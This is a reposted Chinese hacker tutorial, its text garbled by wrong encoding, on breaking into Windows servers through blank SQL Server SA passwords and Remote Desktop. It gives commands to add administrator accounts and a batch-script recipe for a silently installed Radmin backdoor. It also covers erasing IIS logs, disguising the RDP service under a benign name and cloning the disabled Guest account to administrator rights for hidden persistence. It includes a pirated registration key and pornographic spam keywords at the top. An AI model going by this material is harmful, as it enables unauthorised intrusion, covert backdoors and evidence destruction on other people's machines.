人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動(dòng)態(tài)

黑客經(jīng)驗(yàn)談系列之入侵3389起源完整編

發(fā)布日期:2021-12-27 08:27 | 文章來源:gibhub
這多是本人多年下來的經(jīng)驗(yàn)。   工具:WINNTAutoAttack自動(dòng)攻擊器(掃漏洞);SQLTOOLS(SA空口令連接器);RAMDIN影子3.0中文版(遠(yuǎn)程控制程序)(RADMIN注冊(cè)碼):   08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開3389端口服務(wù)的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠(yuǎn)程桌面連接程序)。   一.掃到SA弱口令(自動(dòng)攻擊器)   二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet 開telnet服務(wù) net user mint mint /add 添加用戶mint密碼為mint net localgroup administrators mint /add 將帳號(hào)mint升級(jí)為管理員
  三.上傳后門程序RAD.EXE(RADMIN服務(wù)端自解壓程序)   制作RAD.EXE過程:   1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;   2、在本地設(shè)置服務(wù)端(一定要生成);   設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成   3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg;   4、編寫一個(gè)批處理,并命名為u.bat;
@echo off
net stop r_server
   5、寫第二個(gè)批處理,r.bat,內(nèi)容為:
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat
  6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;   7、將Rad.rar制作成自解壓文件;   選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)   -->>常規(guī)   釋放路徑:%systemroot%\\system32   安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat   -->>摸式   緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件   -->>確定-->>確定   生成完成。
四.用RADMIN客服端連接
  上傳文件到c:\\WINNT(XP是windows):   port.bat(如果是在XP下,這個(gè)要把里面的WINNT改為Windows)   query.exe quser.exe   SC.exe   CleanIISLog.exe.exe   3389.exe   psu.exe   最好再上傳一個(gè)反彈后門RADMIN進(jìn)入TELNET。   運(yùn)行c:\\winnt\\3389.exe,重啟肉雞。   五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去   這里就有時(shí)會(huì)出現(xiàn)個(gè)問題。   使用3389登陸,發(fā)現(xiàn)登陸用戶已滿,不用怕,我們把他踢出去。   telnet對(duì)方ip,發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證。我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。   找到c:\\winnt\\system32\\cmd.exe 建立一個(gè)快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint,telnet對(duì)方ip,直接可以登陸對(duì)方電腦了。   使用命令:   c:\\query user (查看對(duì)方目前終端登陸狀況。)   運(yùn)行命令:   c:\\logoff 1(踢出去一個(gè)管理者)   再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)   六.連上后..在cmd下運(yùn)行   c:\\winnt\\log . 自己的IP .(擦PP)   c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)   七.打SA空口令補(bǔ)丁   程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)   -->>Windowst身位驗(yàn)證登陸   復(fù)制一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id = object_id(N\’[dbo].[xp_cmdshell]\’) and OBJECTPROPERTY(id, N\’IsExtendedProc\’) = 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’ GO
   按F5(運(yùn)行),關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次,退出(這是為了不留下記錄)。
八.改3389端口和服務(wù)名稱
  修改服務(wù)器端的端口設(shè)置,注冊(cè)表有2個(gè)地方需要修改。   [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。   第二個(gè)地方:   [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。   要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)   導(dǎo)出3389服務(wù)的   [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]   的鍵值為mm.reg文件。編輯mm.reg文件,替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行) 。再把第十行的"Description"="(這里是服務(wù)說明,改為你所換的服務(wù)說明,這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"第十一行的"DisplayName"="(這里是服務(wù)名稱,改為你所換的服務(wù)名稱,這里改為Alerter)。保存,再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)。   再在CMD下
CD c:\\winnt\\system32
copy termsrv.exe service.exe(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\\winnt
sc \\\\127.0.0.1 config Alerter binpath= c:\\winnt\\system32\\service.exe(這里是從新定向
Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫A要大寫)
  九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞   十.使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號(hào)   1.使用psu.exe展開注冊(cè)表到   HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users   用法:[psu -p regedit -i pid]   Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。   如:psu –p regedit –i 157   將Guest克成管理員權(quán)限,克成管理員權(quán)限的方法:   找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類型值。   在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個(gè)類型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類型值(找的方法一樣)。   導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類型值的數(shù)據(jù)),然后刪除Guest的配置。   2.查看計(jì)算機(jī)管理中帳戶列表,刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過這步也行)。   3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)。   4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net user Guest **** [修改密碼]
net user Guest /active:yes
net user Guest /active:no[命令行下禁用Guest]
  5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用。   6.用Guest登陸后刪除自己建的帳號(hào)。
net user mint /del
  整個(gè)過程結(jié)束。   最后最好把RADMIN的服務(wù)也改了,多留個(gè)后門多條路,呵呵。整個(gè)過程全部結(jié)束,這機(jī)子就真正變成你的肉雞了。

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實(shí)時(shí)開通

自選配置、實(shí)時(shí)開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對(duì)1客戶咨詢顧問

在線
客服

在線客服:7*24小時(shí)在線

客服
熱線

400-630-3752
7*24小時(shí)客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部